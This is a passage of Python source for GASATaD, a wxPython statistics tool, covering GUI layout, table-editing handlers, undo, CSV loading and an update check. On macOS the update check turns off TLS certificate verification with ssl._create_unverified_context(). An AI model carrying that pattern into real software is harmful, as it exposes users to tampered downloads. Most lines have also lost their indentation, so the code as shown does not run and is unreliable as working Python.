self.m_renameSelectedCol.Enable(False)
self.m_moveSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Move selected column", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_moveSelectedCol)
self.m_moveSelectedCol.Enable(False)
self.m_replaceInCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Replace in selected column...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_replaceInCol)
self.m_replaceInCol.Enable(False)
self.m_sortSubMenu = wx.Menu()
self.m_sortAscending = self.m_sortSubMenu.Append(wx.ID_ANY, "ascending")
self.m_sortDescending = self.m_sortSubMenu.Append(wx.ID_ANY, "descending")
self.sortMenuID = wx.NewId()
self.m_editMenu.Append(self.sortMenuID, "Sort using selected column", self.m_sortSubMenu)
self.m_editMenu.Enable(self.sortMenuID, False)
self.m_discretizeSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Convert selected column to text",
wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_discretizeSelectedCol)
self.m_discretizeSelectedCol.Enable(False)
self.m_numerizeSelectedCol = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Convert selected column to numbers",
wx.EmptyString, wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_numerizeSelectedCol)
self.m_numerizeSelectedCol.Enable(False)
self.m_editMenu.AppendSeparator()
self.m_addNewColumn = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Add text column...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_addNewColumn)
self.m_addNewColumn.Enable(False)
self.m_deleteColumns = wx.MenuItem(self.m_fileMenu, wx.ID_ANY, u"Delete columns...", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_editMenu.Append(self.m_deleteColumns)
self.m_deleteColumns.Enable(False)
# ------------ About menu
self.m_aboutMenu = wx.Menu()
if platform != "darwin":
self.m_menuAbout = wx.MenuItem(self.m_aboutMenu, wx.ID_ABOUT, u"About GASATaD", wx.EmptyString,
wx.ITEM_NORMAL)
else:
self.m_menuAbout = wx.MenuItem(self.m_aboutMenu, wx.ID_ANY, u"About GASATaD", wx.EmptyString,
wx.ITEM_NORMAL)
self.m_aboutMenu.Append(self.m_menuAbout)
self.m_menubar1.Append(self.m_fileMenu, u"File")
self.m_menubar1.Append(self.m_editMenu, u"Edit")
# self.m_menubar1.Append( self.m_optionsMenu, u"Options")
self.m_menubar1.Append(self.m_aboutMenu, u"About")
self.SetMenuBar(self.m_menubar1)
# self.m_menubar1.SetFocus()
globalSizer = wx.BoxSizer(wx.HORIZONTAL)
leftSizer = wx.BoxSizer(wx.VERTICAL)
# -------------------- Information part of the interface
informationSizer = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, u""), wx.VERTICAL)
self.m_staticText2 = wx.StaticText(informationSizer.GetStaticBox(), wx.ID_ANY, u"Data information",
wx.DefaultPosition, wx.DefaultSize, 0)
self.m_staticText2.Wrap(-1)
self.m_staticText2.SetFont(
wx.Font(wx.NORMAL_FONT.GetPointSize(), wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD,
False, wx.EmptyString))
informationSizer.Add(self.m_staticText2, 0, wx.ALL, 5)
informationBoxSizer = wx.BoxSizer(wx.VERTICAL)
textInfo = u"Rows: 0 Columns: 0 Nulls: 0"
self.m_information = wx.StaticText(informationSizer.GetStaticBox(), wx.ID_ANY, textInfo, wx.DefaultPosition,
wx.DefaultSize, 0)
informationBoxSizer.Add(self.m_information, 0, wx.LEFT, 0)
informationSizer.Add(informationBoxSizer, 1, wx.RIGHT | wx.LEFT | wx.BOTTOM, 10)
leftSizer.Add(informationSizer, flag=wx.LEFT | wx.RIGHT | wx.BOTTOM | wx.EXPAND, border=10)
# -------------------- Buttons of the interface
buttonsSizer = wx.BoxSizer(wx.VERTICAL)
buttonsSubSizer1 = wx.GridSizer(rows=2, cols=2, vgap=0, hgap=0)
self.openNewFileBtn = wx.Button(self, wx.ID_ANY, u"Open new file", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.openNewFileBtn, 0, wx.TOP | wx.BOTTOM | wx.LEFT | wx.EXPAND, 5)
self.addFileBtn = wx.Button(self, wx.ID_ANY, u"Add file", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.addFileBtn, 0, wx.ALL | wx.EXPAND, 5)
self.addFileBtn.Enable(False)
self.exportDataBtn = wx.Button(self, wx.ID_ANY, u"Save data", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.exportDataBtn, 0, wx.TOP | wx.BOTTOM | wx.LEFT | wx.EXPAND, 5)
self.exportDataBtn.Enable(False)
self.resetDataBtn = wx.Button(self, wx.ID_ANY, u"Close data", wx.DefaultPosition, wx.DefaultSize, 0)
buttonsSubSizer1.Add(self.resetDataBtn, 0, wx.ALL | wx.EXPAND, 5)
self.resetDataBtn.Enable(False)
buttonsSizer.Add(buttonsSubSizer1, 0, wx.EXPAND, 0)
buttonsSizer.AddSpacer(10)
self.descriptiveStatsBtn = wx.Button(self, wx.ID_ANY, u"Basic statistics", wx.DefaultPosition, wx.DefaultSize,
0)
self.descriptiveStatsBtn.Enable(False)
# self.descriptiveStatsBtn.SetMinSize( wx.Size( -1,25 ) )
buttonsSizer.Add(self.descriptiveStatsBtn, 0, wx.ALL | wx.EXPAND, 5)
self.significanceTestBtn = wx.Button(self, wx.ID_ANY, u"Significance tests", wx.DefaultPosition, wx.DefaultSize,
0)
self.significanceTestBtn.Enable(False)
# self.significanceTestBtn.SetMinSize( wx.Size( -1,25 ) )
buttonsSizer.Add(self.significanceTestBtn, 0, wx.ALL | wx.EXPAND, 5)
buttonsSizer.AddSpacer(10)
leftSizer.Add(buttonsSizer, flag=wx.ALL | wx.EXPAND, border=5)
# -------------------- Buttons for plot
gSizerChart = wx.GridSizer(0, 3, 0, 0)
# Images needed for the buttons
self.histogramBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/histogram1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.scatterPlotmBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/scatterPlot1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.pieChartmBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/pieChart1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.boxPlotBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/boxPlot1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.barChartBmp = wx.Image(str(os.path.dirname(__file__)) + "/icons/barChart1.png",
wx.BITMAP_TYPE_ANY).ConvertToBitmap()
self.histogramBtn = wx.BitmapButton(self, wx.ID_ANY, self.histogramBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.histogramBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.histogramBtn.Enable(False)
self.histogramBtn.SetToolTip(wx.ToolTip("Histogram"))
self.scatterPlotBtn = wx.BitmapButton(self, wx.ID_ANY, self.scatterPlotmBmp, wx.DefaultPosition,
wx.Size(80, 80), wx.BU_AUTODRAW)
gSizerChart.Add(self.scatterPlotBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.scatterPlotBtn.Enable(False)
self.scatterPlotBtn.SetToolTip(wx.ToolTip("Scatter Plot"))
self.pieChartBtn = wx.BitmapButton(self, wx.ID_ANY, self.pieChartmBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.pieChartBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.pieChartBtn.Enable(False)
self.pieChartBtn.SetToolTip(wx.ToolTip("Pie Chart"))
self.boxPlotBtn = wx.BitmapButton(self, wx.ID_ANY, self.boxPlotBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.boxPlotBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.boxPlotBtn.Enable(False)
self.boxPlotBtn.SetToolTip(wx.ToolTip("Box Plot"))
self.barChartBtn = wx.BitmapButton(self, wx.ID_ANY, self.barChartBmp, wx.DefaultPosition, wx.Size(80, 80),
wx.BU_AUTODRAW)
gSizerChart.Add(self.barChartBtn, 0, wx.ALIGN_CENTER | wx.ALL, 5)
self.barChartBtn.Enable(False)
self.barChartBtn.SetToolTip(wx.ToolTip("Bar Chart"))
leftSizer.Add(gSizerChart, flag=wx.ALL | wx.EXPAND, border=5)
# ------------------- Info about upgrades
if self.params['upgradable']:
import wx.lib.agw.gradientbutton as GB
leftSizer.AddStretchSpacer(1)
# self.upgradeButton = wx.Button( self, wx.ID_ANY, u"* New version: "+self.params['availableVersionToUpgrade']+" *", wx.DefaultPosition, wx.DefaultSize, 0 )
self.upgradeButton = GB.GradientButton(self, label="New version available: " + (
self.params['availableVersionToUpgrade'].decode('utf-8')))
self.upgradeButton.SetBaseColours(startcolour=wx.TheColourDatabase.Find('PALE GREEN'),
foregroundcolour=wx.BLACK)
self.upgradeButton.SetPressedBottomColour(wx.TheColourDatabase.Find('LIGHT GREY'))
self.upgradeButton.SetPressedTopColour(wx.TheColourDatabase.Find('LIGHT GREY'))
boldFont = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
boldFont.SetWeight(wx.BOLD)
self.upgradeButton.SetFont(boldFont)
self.Bind(wx.EVT_BUTTON, self.openBrowserDownload, id=self.upgradeButton.GetId())
leftSizer.Add(self.upgradeButton, flag=wx.ALL | wx.EXPAND, border=5)
globalSizer.Add(leftSizer, flag=wx.EXPAND | wx.ALL, border=10)
# ------------------- Data table
self.m_dataTable = wx.grid.Grid(self)
# Grid
self.m_dataTable.CreateGrid(45, 45)
self.m_dataTable.EnableEditing(False)
self.m_dataTable.EnableGridLines(True)
self.m_dataTable.EnableDragGridSize(False)
self.m_dataTable.SetMargins(0, 0)
# Columns
self.m_dataTable.EnableDragColMove(False)
self.m_dataTable.EnableDragColSize(False)
self.m_dataTable.SetColLabelSize(30)
self.m_dataTable.SetColLabelAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)
# Rows
self.m_dataTable.EnableDragRowSize(False)
self.m_dataTable.SetRowLabelSize(80)
self.m_dataTable.SetRowLabelAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTRE)
# Cell Defaults
self.m_dataTable.SetDefaultCellAlignment(wx.ALIGN_CENTRE, wx.ALIGN_CENTER)
# Selection mode
self.m_dataTable.SetSelectionMode(wx.grid.Grid.wxGridSelectRows | wx.grid.Grid.wxGridSelectColumns)
# self.m_dataTable.EnableEditing(True)
fgSizer8 = wx.BoxSizer(wx.VERTICAL)
fgSizer8.Add(self.m_dataTable)
self.m_dataTable.Enable(False)
self.m_dataTable.Show(True)
globalSizer.Add(fgSizer8, flag=wx.ALL | wx.EXPAND, border=10)
# Options to show the GUI
self.SetSizer(globalSizer)
self.Layout()
self.Centre(wx.BOTH)
self.Show(True)
# self.Move((0,0))
widthScreen, heightScreen = wx.GetDisplaySize()
widthWindow = 1440
heightWindow = 900
if ((widthScreen >= widthWindow) and (heightScreen > heightWindow)):
self.SetSize((widthWindow, heightWindow))
else:
self.Maximize()
self.SetMinSize((1024, 768))
# Binding between buttons and functions which will control the events
self.Bind(wx.EVT_CLOSE, self.closeApp) # Close window
self.Bind(wx.EVT_MENU, self.openFile, self.m_menuNewFile)
self.Bind(wx.EVT_BUTTON, self.openFile, self.openNewFileBtn)
self.Bind(wx.EVT_MENU, self.addFile, self.m_menuAddFile)
self.Bind(wx.EVT_BUTTON, self.addFile, self.addFileBtn)
self.Bind(wx.EVT_MENU, self.saveFile, self.m_menuExportData)
self.Bind(wx.EVT_MENU, self.resetData, self.m_menuResetData)
self.Bind(wx.EVT_MENU, self.undo, self.m_undo)
self.Bind(wx.EVT_MENU, self.createNewColumn, self.m_addNewColumn)
self.Bind(wx.EVT_MENU, self.deleteColumnsByLabels, self.m_deleteColumns)
self.Bind(wx.EVT_MENU, self.deleteColumnsRows, self.m_deletedSelectedCR)
self.Bind(wx.EVT_MENU, self.renameCol, self.m_renameSelectedCol)
self.Bind(wx.EVT_MENU, self.moveCol, self.m_moveSelectedCol)
self.Bind(wx.EVT_MENU, self.replaceInCol, self.m_replaceInCol)
self.Bind(wx.EVT_MENU, self.discretizeCol, self.m_discretizeSelectedCol)
self.Bind(wx.EVT_MENU, self.numerizeCol, self.m_numerizeSelectedCol)
self.Bind(wx.EVT_MENU, self.sortAscendingCol, self.m_sortAscending)
self.Bind(wx.EVT_MENU, self.sortDescendingCol, self.m_sortDescending)
self.Bind(wx.EVT_MENU, self.appInformation, self.m_menuAbout)
self.Bind(wx.EVT_MENU, self.closeApp, self.m_menuQuit)
self.Bind(wx.EVT_BUTTON, self.createBasicStatisticsInterface, self.descriptiveStatsBtn)
self.Bind(wx.EVT_BUTTON, self.resetData, self.resetDataBtn)
self.Bind(wx.EVT_BUTTON, self.saveFile, self.exportDataBtn)
self.Bind(wx.EVT_BUTTON, self.createHistogram, self.histogramBtn)
self.Bind(wx.EVT_BUTTON, self.createScatterPlot, self.scatterPlotBtn)
self.Bind(wx.EVT_BUTTON, self.createPieChart, self.pieChartBtn)
self.Bind(wx.EVT_BUTTON, self.createBoxPlot, self.boxPlotBtn)
self.Bind(wx.EVT_BUTTON, self.createBarChart, self.barChartBtn)
self.Bind(wx.EVT_BUTTON, self.doSignificanceTest, self.significanceTestBtn)
self.Bind(wx.grid.EVT_GRID_CELL_RIGHT_CLICK, self.rightClickOnTable, self.m_dataTable)
self.Bind(wx.grid.EVT_GRID_LABEL_RIGHT_CLICK, self.rightClickOnTable, self.m_dataTable)
self.Bind(wx.grid.EVT_GRID_RANGE_SELECT, self.contentSelected, self.m_dataTable)
self.Bind(wx.grid.EVT_GRID_CELL_LEFT_DCLICK, self.cellModification, self.m_dataTable)
# A controller object is created
self.controller = Controller()
HelpString = (
" -help: shows this information\n"
" -loadCSV fileName: loads CSV file (full path is required)\n"
)
if (len(sys.argv) != 1 and (sys.platform == 'linux' or sys.platform == 'darwin')):
arguments = sys.argv[1:]
possibleArguments = ['-help', '-loadCSV']
for argument in arguments:
if argument[0] == '-':
if argument not in possibleArguments:
print("\n** ERROR: command '" + argument + "' not recognized **\n")
print("** GASATaD terminal mode commands:")
print(HelpString)
sys.exit(0)
if "-help" in arguments:
print("\n** GASATaD: terminal mode **\n")
print(HelpString)
sys.exit(0)
            elif "-loadCSV" in arguments:
                CSVFileName = arguments[arguments.index("-loadCSV") + 1]
                print("Loading CSV file: " + CSVFileName)
                self.OpenCSVFileNoGUI(CSVFileName)
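    # Single-level undo: restore the snapshot stored by the controller before
    # the last destructive operation, then disable the Undo entry again.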
def undo(self, event):
self.controller.recoverData()
if not self.m_dataTable.IsEnabled():
self.m_dataTable.Enable()
self.refreshGUI()
self.m_undo.SetText("Undo")
self.m_undo.Enable(False)
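    # Double-clicking a cell opens an entry dialog: an empty value stores NaN,
    # numeric strings are stored as float64, anything else is kept as text.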
def cellModification(self, event):
dlg = wx.TextEntryDialog(self, "Type new value for cell (empty for 'null'):", 'Change cell', '')
if dlg.ShowModal() == wx.ID_OK:
newValue = dlg.GetValue()
dlg.Destroy()
if newValue == "":
newValue2 = numpy.NaN
else:
try:
newValue2 = numpy.float64(newValue)
                except ValueError:
newValue2 = newValue
self.controller.storeData()
self.m_undo.SetText("Undo change cell")
self.m_undo.Enable()
self.controller.changeCellValue(event.GetRow(), event.GetCol(), newValue2)
self.controller.detectColumnTypes()
self.refreshGUI()
event.Skip()
else:
dlg.Destroy()
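    # Selection handler: enable/disable edit-menu entries according to how many
    # rows/columns are selected and whether the selected column holds text.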
def contentSelected(self, event):
columnsSelected = self.m_dataTable.GetSelectedCols()
rowsSelected = self.m_dataTable.GetSelectedRows()
if len(rowsSelected) == 0 and len(columnsSelected) == 0:
self.m_deletedSelectedCR.Enable(False)
else:
self.m_deletedSelectedCR.Enable()
if len(rowsSelected) == 0 and len(columnsSelected) == 1:
self.m_renameSelectedCol.Enable()
self.m_moveSelectedCol.Enable()
self.m_editMenu.Enable(self.sortMenuID, True)
columnSelectedLabel = self.m_dataTable.GetColLabelValue(self.m_dataTable.GetSelectedCols()[0])
if columnSelectedLabel not in self.controller.characterValues:
self.m_discretizeSelectedCol.Enable()
if columnSelectedLabel in self.controller.characterValues:
self.m_numerizeSelectedCol.Enable()
self.m_replaceInCol.Enable()
else:
self.m_renameSelectedCol.Enable(False)
self.m_moveSelectedCol.Enable(False)
self.m_discretizeSelectedCol.Enable(False)
self.m_numerizeSelectedCol.Enable(False)
self.m_replaceInCol.Enable(False)
self.m_editMenu.Enable(self.sortMenuID, False)
event.Skip()
def deleteColumnsRows(self, event):
rowsSelected = self.m_dataTable.GetSelectedRows()
columnsSelected = self.m_dataTable.GetSelectedCols()
self.controller.storeData()
self.m_undo.SetText("Undo delete columns/rows")
self.m_undo.Enable()
columnsSelectedLabels = []
for columnIndex in columnsSelected:
columnsSelectedLabels.append(self.m_dataTable.GetColLabelValue(columnIndex))
self.controller.deleteColumns(columnsSelectedLabels)
if len(rowsSelected) > 0:
self.controller.deleteRows(rowsSelected)
if self.controller.programState.dataToAnalyse.empty:
self.controller.resetDataToAnalyse()
self.refreshGUI()
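    # Build a context menu on the fly; its entries depend on whether the click
    # landed on selected columns or selected rows and on the column type.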
def rightClickOnTable(self, event):
columnClicked = event.GetCol()
columnsSelected = self.m_dataTable.GetSelectedCols()
if columnClicked in columnsSelected:
popupMenu = wx.Menu()
textPopupDelete = "Delete column"
if len(columnsSelected) > 1:
textPopupDelete += "s"
self.popupDeleteID = wx.NewId()
popupMenu.Append(self.popupDeleteID, textPopupDelete)
self.Bind(wx.EVT_MENU, self.deleteColumns, id=self.popupDeleteID)
if len(columnsSelected) == 1:
# Renaming menu entry
popupRenameID = wx.NewId()
popupMenu.Append(popupRenameID, "Rename column")
self.Bind(wx.EVT_MENU, self.renameCol, id=popupRenameID)
# Moving menu entry
popupMoveID = wx.NewId()
popupMenu.Append(popupMoveID, "Move column")
self.Bind(wx.EVT_MENU, self.moveCol, id=popupMoveID)
columnSelectedLabel = self.m_dataTable.GetColLabelValue(self.m_dataTable.GetSelectedCols()[0])
if columnSelectedLabel in self.controller.characterValues:
self.popupReplaceInColID = wx.NewId()
popupMenu.Append(self.popupReplaceInColID, "Replace in column")
self.Bind(wx.EVT_MENU, self.replaceInCol, id=self.popupReplaceInColID)
# Sort menu entry
popupSortSubMenuID = wx.NewId()
popupSortAscendingID = wx.NewId()
popupSortDescendingID = wx.NewId()
popupSubMenuSort = wx.Menu()
popupSubMenuSort.Append(popupSortAscendingID, "ascending")
popupSubMenuSort.Append(popupSortDescendingID, "descending")
popupMenu.Append(popupSortSubMenuID, "Sort using column", popupSubMenuSort)
self.Bind(wx.EVT_MENU, self.sortAscendingCol, id=popupSortAscendingID)
self.Bind(wx.EVT_MENU, self.sortDescendingCol, id=popupSortDescendingID)
# self.m_sortDescending = self.m_sortSubMenu.Append(wx.ID_ANY, "Descending")
# self.sortMenuID = wx.NewId()
# self.m_editMenu.AppendMenu(self.sortMenuID, "Sort using selected column",self.m_sortSubMenu )
# self.m_editMenu.Enable(self.sortMenuID,False)
# Discretizing menu entry
if columnSelectedLabel not in self.controller.characterValues:
self.popupDiscretizeID = wx.NewId()
popupMenu.Append(self.popupDiscretizeID, "Convert column to text")
self.Bind(wx.EVT_MENU, self.discretizeCol, id=self.popupDiscretizeID)
if columnSelectedLabel in self.controller.characterValues:
self.popupNumerizeID = wx.NewId()
popupMenu.Append(self.popupNumerizeID, "Convert column to numbers")
self.Bind(wx.EVT_MENU, self.numerizeCol, id=self.popupNumerizeID)
self.PopupMenu(popupMenu)
popupMenu.Destroy()
rowClicked = event.GetRow()
rowsSelected = self.m_dataTable.GetSelectedRows()
if rowClicked in rowsSelected:
textPopupDelete = "Delete row"
if len(rowsSelected) > 1:
textPopupDelete += "s"
popupMenu = wx.Menu()
self.popupDeleteID = wx.NewId()
popupMenu.Append(self.popupDeleteID, textPopupDelete)
self.Bind(wx.EVT_MENU, self.deleteRows, id=self.popupDeleteID)
self.PopupMenu(popupMenu)
popupMenu.Destroy()
event.Skip()
def deleteColumns(self, event): # Used after right-click on selected columns
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnsSelectedLabels = []
for columnIndex in columnsSelectedIndex:
columnsSelectedLabels.append(self.m_dataTable.GetColLabelValue(columnIndex))
self.controller.storeData()
self.m_undo.SetText("Undo delete columns")
self.m_undo.Enable()
self.controller.deleteColumns(columnsSelectedLabels)
if self.controller.programState.dataToAnalyse.empty:
self.controller.resetDataToAnalyse()
self.refreshGUI()
def moveCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
oldPos = columnsSelectedIndex[0]
maxPos = self.controller.getNumberOfColumns() - 1
newPosOk = False
while not newPosOk:
dlg = wx.TextEntryDialog(self, "New position for column (between 0 and " + str(maxPos) + "):",
"Move column", "")
if dlg.ShowModal() == wx.ID_OK:
newPos = dlg.GetValue()
dlg.Destroy()
try:
newPos = int(newPos)
newPosOk = True
                except ValueError:
                    pass
if newPosOk and (newPos < 0 or newPos > maxPos):
newPosOk = False
else:
dlg.Destroy()
break
if newPosOk:
self.controller.storeData()
self.m_undo.SetText("Undo move column")
self.m_undo.Enable()
colIndex = list(self.controller.getDataToAnalyse().columns)
label = colIndex[columnsSelectedIndex[0]]
colIndex.pop(columnsSelectedIndex[0])
colIndex.insert(newPos, label)
self.controller.reorderColumns(colIndex)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, newPos)
self.m_dataTable.MakeCellVisible(0, newPos)
self.m_dataTable.SelectCol(newPos)
def renameCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
oldLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
dlg = wx.TextEntryDialog(self, "Type new label for column '" + oldLabel + "':", 'Rename column', '')
if dlg.ShowModal() == wx.ID_OK:
newLabel = dlg.GetValue()
dlg.Destroy()
self.controller.storeData()
self.m_undo.SetText("Undo rename column")
self.m_undo.Enable()
self.controller.renameColumn(oldLabel, newLabel)
self.refreshGUI(updateDataInfo=False, markNans=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
self.m_dataTable.SelectCol(columnsSelectedIndex[0])
else:
dlg.Destroy()
def replaceInCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
colLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
listTags = list(self.controller.programState.dataToAnalyse[str(colLabel)].unique())
if numpy.NaN in listTags:
listTags.remove(numpy.NaN)
listTags.insert(0, 'null')
selectValuesInterface = ReplaceInColInterface(self, listTags)
if selectValuesInterface.ShowModal() == wx.ID_OK:
self.controller.storeData()
self.m_undo.SetText("Undo replace")
self.m_undo.Enable()
oldTag, newTag = selectValuesInterface.getValues()
if oldTag == 'null':
oldTag = numpy.NaN
if newTag == "":
newTag = numpy.NaN
self.controller.replaceInTextCol(colLabel, oldTag, newTag)
self.refreshGUI()
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
self.m_dataTable.SelectCol(columnsSelectedIndex[0])
def discretizeCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnSelectedLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
self.controller.storeData()
self.m_undo.SetText("Undo convert to text")
self.m_undo.Enable()
self.controller.programState.dataToAnalyse[columnSelectedLabel] = self.controller.programState.dataToAnalyse[
columnSelectedLabel].astype(str)
self.controller.characterValues.append(columnSelectedLabel)
if columnSelectedLabel in self.controller.floatValues:
self.controller.floatValues.remove(columnSelectedLabel)
if columnSelectedLabel in self.controller.integerValues:
self.controller.integerValues.remove(columnSelectedLabel)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
def numerizeCol(self, event):
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnSelectedLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
self.controller.storeData()
self.m_undo.SetText("Undo convert to numbers")
self.m_undo.Enable()
oldType = self.controller.programState.dataToAnalyse[columnSelectedLabel].dtypes
self.controller.programState.dataToAnalyse[columnSelectedLabel] = to_numeric(
self.controller.programState.dataToAnalyse[columnSelectedLabel], errors='ignore')
newType = self.controller.programState.dataToAnalyse[columnSelectedLabel].dtypes
if oldType == newType:
dlg = wx.MessageDialog(None,
"The column '" + columnSelectedLabel + "' could not be converted to numerical values",
"Invalid conversion", wx.OK | wx.ICON_INFORMATION)
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
else:
self.controller.characterValues.remove(columnSelectedLabel)
if newType == 'float64':
self.controller.floatValues.append(columnSelectedLabel)
else:
self.controller.integerValues.append(columnSelectedLabel)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
def sortAscendingCol(self, event):
self.sortCol(True)
def sortDescendingCol(self, event):
self.sortCol(False)
def sortCol(self, ascendingBool):
self.controller.storeData()
self.m_undo.SetText("Undo sort rows")
self.m_undo.Enable()
columnsSelectedIndex = self.m_dataTable.GetSelectedCols()
columnSelectedLabel = self.m_dataTable.GetColLabelValue(columnsSelectedIndex[0])
self.controller.programState.dataToAnalyse.sort_values(columnSelectedLabel, ascending=ascendingBool,
inplace=True)
self.refreshGUI(updateDataInfo=False)
self.m_dataTable.SetGridCursor(0, columnsSelectedIndex[0])
self.m_dataTable.MakeCellVisible(0, columnsSelectedIndex[0])
self.m_dataTable.SelectCol(columnsSelectedIndex[0])
def deleteRows(self, event): # Used after right-click on selected rows
rowsSelectedIndex = self.m_dataTable.GetSelectedRows()
rowsSelectedLabels = []
for rowIndex in rowsSelectedIndex:
rowsSelectedLabels.append(self.m_dataTable.GetRowLabelValue(rowIndex))
self.controller.storeData()
self.m_undo.SetText("Undo delete rows")
self.m_undo.Enable()
self.controller.deleteRows(rowsSelectedIndex)
if self.controller.programState.dataToAnalyse.empty:
self.controller.resetDataToAnalyse()
self.refreshGUI()
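    # Compare the running version against the version file published for this
    # platform/packaging; network problems are silently ignored.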
def CheckUpdates(self):
from sys import argv
import urllib.request, urllib.error
import os
remoteVersion = ""
remoteVersionFile = ""
if (platform == "linux" or platform == "linux2") and argv[0] == "/usr/share/gasatad/GASATaD_2_0.py":
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/deb.txt"
elif (platform == "darwin") and ("GASATaD.app" in os.path.realpath(__file__)):
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/mac.txt"
elif platform == "win32" and argv[0].endswith(".exe"):
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/win.txt"
elif argv[0].endswith("GASATaD_2_0.py"):
# print "# Running GASATaD from source"
remoteVersionFile = "https://raw.githubusercontent.com/milegroup/gasatad/master/docs/programVersions/src.txt"
if remoteVersionFile:
try:
if platform != "darwin":
remoteFile = urllib.request.urlopen(remoteVersionFile)
remoteVersion = remoteFile.readline().strip()
remoteFile.close()
else:
import ssl
context = ssl._create_unverified_context()
remoteFile = urllib.request.urlopen(remoteVersionFile, context=context)
remoteVersion = remoteFile.readline().strip()
remoteFile.close()
# print "# Version available in GASATaD web page: ", remoteVersion
except urllib.error.URLError:
# print "# I couldn't check for updates"
                pass
if remoteVersion:
# print "# Version file exists"
if float(remoteVersion) > float(self.params['version']):
self.params['upgradable'] = True
self.params['availableVersionToUpgrade'] = remoteVersion
# self.params['upgradable'] = True
# self.params['availableVersionToUpgrade'] = remoteVersion
def openBrowserDownload(self, event):
import webbrowser
webbrowser.open("https://milegroup.github.io/gasatad/#download")
def updateDataInfo(self):
if self.controller.programState.dataToAnalyse.empty:
textInfo = u"Rows: 0 Columns: 0 Nulls: 0"
self.m_information.SetLabel(textInfo)
else:
numRows = self.controller.getNumberOfRows()
numCols = self.controller.getNumberOfColumns()
textInfo = "Rows: {0:d} Columns: {1:d} Nulls: {2:d}".format(numRows, numCols, self.params['noOfNulls'])
# textInfo += "\nText columns: {0:d}".format(len(self.controller.characterValues))
# textInfo += "\nInteger columns: {0:d}".format(len(self.controller.integerValues))
# textInfo += "\nFloat columns: {0:d}".format(len(self.controller.floatValues))
self.m_information.SetLabel(textInfo)
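    # Terminal-mode CSV loading, used by the -loadCSV command line option.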
def OpenCSVFileNoGUI(self, fileName):
self.data = None
try:
            self.Datafile = open(fileName, 'r')  # universal newlines are the default in Python 3 ('rU' is deprecated)
self.data = read_csv(self.Datafile, sep=None, engine='python', encoding='utf-8')
self.data.drop(self.data.columns[[0]], axis=1, inplace=True)
self.data.rename(columns={'Unnamed: 0': 'NoTag'}, inplace=True)
self.controller.OpenFile(self.data)
except UnicodeDecodeError:
print("Error: non ascii files in file")
return
except:
print("Error: ", sys.exc_info()[0])
print("There was some problem with the file")
return
self.refreshGUI()
print("File: " + fileName + " loaded")
def openFile(self, event):
askfile = AskFileType(self, -1, "open")
askfile.CenterOnScreen()
askfile.ShowModal()
askfile.Destroy()
def addFile(self, event):
askfile = AskFileType(self, -1, "add")
askfile.CenterOnScreen()
askfile.ShowModal()
askfile.Destroy()
